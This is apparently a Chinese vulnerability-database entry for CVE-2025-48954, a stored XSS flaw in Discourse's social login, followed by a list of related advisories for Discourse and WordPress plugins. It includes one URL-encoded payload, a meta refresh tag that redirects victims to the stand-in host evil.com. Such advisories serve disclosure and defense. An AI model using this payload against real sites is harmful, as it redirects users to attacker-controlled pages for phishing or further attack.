Discourse存在XSS漏洞(CVE-2025-48954)

漏洞描述

3.5.0.beta6 之前的 Discourse 版本在OAuth/社交登录功能中存在存储型跨站脚本（XSS）漏洞。该漏洞是由于在处理社交登录失败时缺乏适当的内容安全策略实施导致的，这使得远程攻击者能够在用户浏览器中注入并执行恶意脚本。可以使用payload进行meta重定向跳转：%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Dhttps%3A//evil.com%22%3E

相关漏洞推荐

CVE-2024-53991: Discourse Backup File Disclosure Via Default Nginx Configuration POC

2025-08-01 | Discourse

Discourse is an open source platform for community discussion. This vulnerability only impacts Disco...
CVE-2025-48954: Discourse OAuth Social Login - Cross-site Scripting POC

2025-08-01 | Discourse

Discourse versions prior to 3.5.0.beta6 contain a stored Cross-Site Scripting (XSS) vulnerability in...
Discourse 跨站脚本漏洞无POC

2025-02-06 | Discourse

Discourse是Discourse开源的一套开源的社区讨论平台。该平台包括社区、电子邮件和聊天室等功能。 Discourse存在跨站脚本漏洞，该漏洞源于攻击者可以通过发布恶意构造的一框链接在用户的...
Wordpress Plugin Depicter /wp-admin/admin-ajax.php depicter-lead-list SQL 注入漏洞（CVE-2025-2011）无POC

2025-09-19 | Wordpress

WordPress插件Depicter的滑块和弹出窗口构建器在包括3.6.1版本在内的所有版本中，由于用户提供的参数缺乏足够的转义处理和现有SQL查询的预处理不足，存在通用的SQL注入漏洞。该漏洞可以...
Wordpress Plugin Eventin /wp-admin/admin-ajax.php proxy_image 文件读取漏洞（CVE-2025-3419）无POC

2025-09-19 | Wordpress

Event Manager, Events Calendar, Tickets, Registrations – Eventin 是一个用于 WordPress 的插件。该漏洞存在于其 proxy_i...

漏洞描述

PoC代码

相关漏洞推荐

CVE-2024-53991: Discourse Backup File Disclosure Via Default Nginx Configuration POC

CVE-2025-48954: Discourse OAuth Social Login - Cross-site Scripting POC

Discourse 跨站脚本漏洞 无POC

Wordpress Plugin Depicter /wp-admin/admin-ajax.php depicter-lead-list SQL 注入漏洞（CVE-2025-2011） 无POC

Wordpress Plugin Eventin /wp-admin/admin-ajax.php proxy_image 文件读取漏洞（CVE-2025-3419） 无POC

Discourse 跨站脚本漏洞无POC

Wordpress Plugin Depicter /wp-admin/admin-ajax.php depicter-lead-list SQL 注入漏洞（CVE-2025-2011）无POC

Wordpress Plugin Eventin /wp-admin/admin-ajax.php proxy_image 文件读取漏洞（CVE-2025-3419）无POC